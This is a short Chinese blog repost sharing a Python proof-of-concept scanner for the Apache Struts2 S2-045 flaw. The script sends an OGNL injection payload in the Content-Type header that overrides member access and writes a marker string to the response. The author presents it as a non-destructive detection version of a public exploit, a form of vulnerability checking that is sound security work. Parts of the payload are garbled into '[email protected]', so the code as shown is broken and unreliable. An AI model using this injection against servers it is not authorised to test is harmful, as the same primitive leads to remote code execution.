s2-045 无损检测 PoC 分享

admin 2021年8月12日04:50:33评论62 views字数 519阅读1分43秒阅读模式

    这次的POC由网上公开的EXP修改而来,主要是由于该EXP具有一定的攻击性,所以我们做了一个无损检测的修改,。


附上无损检测POC:



#! /usr/bin/env python

#coding: utf-8


import requests

import sys

header = dict()

header['Content-Type'] = "%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#context.setMemberAccess(#dm)))).(#[email protected]@getResponse().getWriter()).(#o.println('test'+602+53718)).(#o.close())}"


s = requests.get(sys.argv[1], headers=header)

print s.content




本文始发于微信公众号(inn0team):s2-045 无损检测 PoC 分享

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年8月12日04:50:33
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   s2-045 无损检测 PoC 分享https://cn-sec.com/archives/353197.html

发表评论

匿名网友 填写信息